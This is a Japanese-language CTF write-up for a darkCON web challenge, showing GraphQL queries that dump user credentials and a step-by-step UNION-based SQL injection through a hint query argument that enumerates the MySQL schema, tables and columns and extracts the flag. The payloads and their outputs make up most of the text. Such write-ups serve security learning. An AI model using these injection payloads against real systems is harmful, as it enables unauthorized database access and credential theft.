CTFtime.org / darkCON CTF
以下が認証プロセス。
GraphQLが使われているので、とりあえずいつもの抜き出しを行う。
function auth() {
var username = document.getElementById("Username").value;
var password = document.getElementById("Password").value;
var head = btoa(username + ':' + password);
$(document).ready(function() {
$.post("graphql", {
"query": "mutation{login(username:\"" + username + "\",password:\"" + password + "\")}"
}, function(data, textStatus) {
if (data.data.login == "Success") {
document.cookie = "auth=" + head;
window.location = '/dashboard'
} else {
alert('Wrong creds')
}
;
}, "json");
});
}
function yeet() {
document.cookie = "auth=Z3Vlc3Q6a2FybWE5ODc0";
window.location = "/dashboard"
}
mutation{login(username:"admin",password:"password")}
query{Challs{}}
-> Authorization Error
query{allUsers{username password}}
->
{"data":{"allUsers":[{"username":"guest","password":"karma9874"},{"username":"admin","password":"is_this_visible_to_you?"}]}}
ok.
adminパスワードが抜けたので、とりあえずログインしてみる。
admin権限が得られたので、改めてGraphQLを操作してみる。
query{Challs{id title flag{chall_flag}}}
->
{"id":"35","title":"DarkCON Challs","flag":{"chall_flag":"<REDACTED>"}
Try Harderか…
query{Challs{id title description category author points flag{chall_id chall_title chall_flag}}}
->
{"id":"35","title":"DarkCON Challs","description":"\"A place where you can see all the challs of darkCON CTF using api but not the flag or can you @_@ ?\r\nPS :- Try to get the flag of this chall xD\"","category":"Web","author":"Karma","points":500,"flag":{"chall_id":"35","chall_title":"DarkCON Challs","chall_flag":"<REDACTED>"}}
んー…
query{hint(chall_id:"35"){chall_id chall_title take_hint}}
-> 特に…
いや、SQLiか?
query{hint(chall_id:"x"){chall_id chall_title take_hint}}
-> ER_BAD_FIELD_ERROR: Unknown column 'x' in 'where clause'
query{hint(chall_id:"'"){chall_id chall_title take_hint}}
ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
キタキタキタ。
query{hint(chall_id:"-1 union select 1,2,3"){chall_id chall_title take_hint}}
これで1,2,3と出力されるようになった。OK
query{hint(chall_id:"-1 union SELECT GROUP_CONCAT(distinct TABLE_SCHEMA),2,3 FROM INFORMATION_SCHEMA.TABLES"){chall_id chall_title take_hint}}
-> darkcon,information_schema,mysql,performance_schema,sys
query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct table_name),2,3 from information_schema.tables where TABLE_SCHEMA='darkcon'"){chall_id chall_title take_hint}}
-> challs,flags,hints,users
query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='challs'"){chall_id chall_title take_hint}}
-> challs: id,category,title,description,author,points
query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='flags'"){chall_id chall_title take_hint}}
-> flags: chall_id,chall_title,chall_flag
query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct chall_flag),2,3 from flags"){chall_id chall_title take_hint}}
-> darkCON{fake_flag},darkCON{w0ww_y0u_re411y_f0und_m3}
提出できんかったけど、これはあってるやろ。
ok. darkCON{w0ww_y0u_re411y_f0und_m3}